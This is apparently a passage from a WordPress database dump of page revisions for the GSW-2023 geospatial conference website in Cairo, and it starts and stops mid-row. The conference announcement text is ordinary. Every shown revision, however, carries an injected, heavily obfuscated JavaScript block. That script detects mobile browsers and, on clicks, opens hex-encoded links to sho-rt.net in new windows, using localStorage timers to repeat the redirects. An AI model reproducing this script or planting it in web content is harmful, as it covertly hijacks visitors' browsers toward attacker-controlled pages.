\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-08 22:03:02','2022-11-08 22:03:02','',3066,'https://gsw2023.com/?p=3089',0,'revision','',0),
(3090,1,'2022-11-08 22:05:18','2022-11-08 22:05:18','<p>[vc_row][vc_column width=\"1/2\"][vc_column_text]<strong>I am text block.</strong>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" br_style=\"solid\" br_color=\"#ffffff\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:Raleway|font_call:Raleway\" tick_unit_style=\"font-weight:700;\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icons][single_icon icon=\"icomoon-fontawesome-16x16-calendar-alt\" icon_size=\"42\" icon_margin=\"5\" icon_color=\"#2139d3\" icon_style=\"circle\" icon_color_bg=\"#efefef\"][/ultimate_icons][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-08 22:05:18','2022-11-08 22:05:18','',3066,'https://gsw2023.com/?p=3090',0,'revision','',0),
(3091,1,'2022-11-08 22:10:28','2022-11-08 22:10:28','[vc_row][vc_column width=\"1/2\"][vc_column_text]<strong>I am text block.</strong>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" br_style=\"solid\" br_color=\"#ffffff\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:Raleway|font_call:Raleway\" tick_unit_style=\"font-weight:700;\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][/vc_row_inner][ultimate_icons][single_icon icon=\"icomoon-fontawesome-16x16-calendar-alt\" icon_size=\"42\" icon_margin=\"5\" icon_color=\"#2139d3\" icon_style=\"circle\" icon_color_bg=\"#efefef\"][/ultimate_icons][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3